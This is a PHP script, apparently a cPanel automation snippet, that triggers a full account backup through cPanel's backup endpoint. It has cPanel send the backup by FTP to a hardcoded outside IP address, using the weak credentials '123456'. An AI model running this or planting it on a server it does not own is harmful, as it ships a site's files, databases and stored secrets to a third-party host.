<?php/*cPanel Backup Script*/

$auth = base64_encode("");$domain = "  ";$theme = "x3";$secure = true;$ftp = true;$ftpserver = "5.9.71.85";$ftpusername = "box";$ftppassword = "123456";$ftpport = "21";$ftpdirectory = "/";
if ($secure) {	$url = "ssl://" . $domain;	$port = 2083;} else {	$url = $domain;	$port = 2082;}
$socket = fsockopen($url, $port);if (!$socket) {	exit("Failed to open socket connection.");}
if ($ftp) {	$params = "dest=ftp&server=$ftpserver&user=$ftpusername&pass=$ftppassword&port=$ftpport&rdir=$ftpdirectory&submit=Generate Backup";} else {	$params = "submit=Generate Backup";}
fputs($socket, "POST /frontend/" . $theme . "/backup/dofullbackup.html?" . $params . " HTTP/1.0\r\n");fputs($socket, "Host: $domain\r\n");fputs($socket, "Authorization: Basic $auth\r\n");fputs($socket, "Connection: Close\r\n");fputs($socket, "\r\n");
while (!feof($socket)) {	$response = fgets($socket, 4096);	echo $response;}fclose($socket);

// The message$message = "Your Backup is Ready";$datee = date("m/d/y");
// Sendmail('man@gmail.com', 'Full Site Backup', $message,$datee);
?>
